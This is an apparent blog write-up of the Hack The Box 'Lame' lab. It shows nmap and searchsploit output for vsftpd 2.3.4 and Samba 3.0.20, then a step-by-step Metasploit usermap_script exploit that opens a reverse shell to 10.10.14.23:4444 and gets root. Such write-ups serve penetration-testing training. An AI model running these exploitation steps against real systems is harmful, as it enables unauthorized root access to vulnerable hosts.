Posts Hack The Box - Lame Writeup
Post
Cancel

Hack The Box - Lame Writeup

f3cb6a9ace14b68a0dabdb39d231adec.png

IPOSDifficultyRelease Date
10.10.10.3LinuxEasy14 March 2017

Enumeration

Our first task will be running an nmap scan on the host to see which ports are open and have running services.

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
kali@kali:~/Desktop$ nmap -sC -sV -T4 -v -Pn 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-13 13:18 

Discovered open port 22/tcp on 10.10.10.3
Discovered open port 21/tcp on 10.10.10.3
Discovered open port 139/tcp on 10.10.10.3
Discovered open port 445/tcp on 10.10.10.3

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.23
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 57.25 seconds

From our scan we can see that we have a Linux host running FTP, SSH and SMB.

Checking for vulnerabilities

Using the information we found with nmap we can check if any of the installed services are vulnerable with searchsploit.

Searchsploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
kali@kali:~/Desktop$ searchsploit vsftpd 2.3.4
---------------------------------------------------------------- ---------------------------------
 Exploit Title                                                  |  Path
---------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)          | unix/remote/17491.rb
---------------------------------------------------------------- ---------------------------------

kali@kali:~/Desktop$ searchsploit samba 3.0.20
---------------------------------------------------------------- ---------------------------------
 Exploit Title                                                  |  Path
---------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass          | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execu | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                           | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                           | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                   | linux_x86/dos/36741.py
---------------------------------------------------------------- ---------------------------------

Searchsploit reveals that vsftpd 2.3.4 and samba 3.0.20 are vulnerable and have exploits available for use.

Exploitation

To exploit this box we will use metasploit as both vulnerabilities on this host have modules available.

Exploiting Samba

To exploit this version of samba we will use the metasploit module exploit/multi/samba/usermap_script.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
msfconsole
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 10.10.14.23:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo OhcjF5EzUh05OsNp;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "OhcjF5EzUh05OsNp\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.23:4444 -> 10.10.10.3:46694) at 2020-06-13 14:04:47 -0400


whoami
root
  1. We open metasploit with msfconsole
  2. set the module with use exploit/multi/samba/usermap_script
  3. See what options need set with show options
  4. Set the remote host option with set RHOSTS 10.10.10.3
  5. Run the exploit with run or exploit

Momentarily a shell session will begin as the root user. The user flag can be found in the /home directory and the root flag is in /root.

This post is licensed under CC BY 4.0 by the author.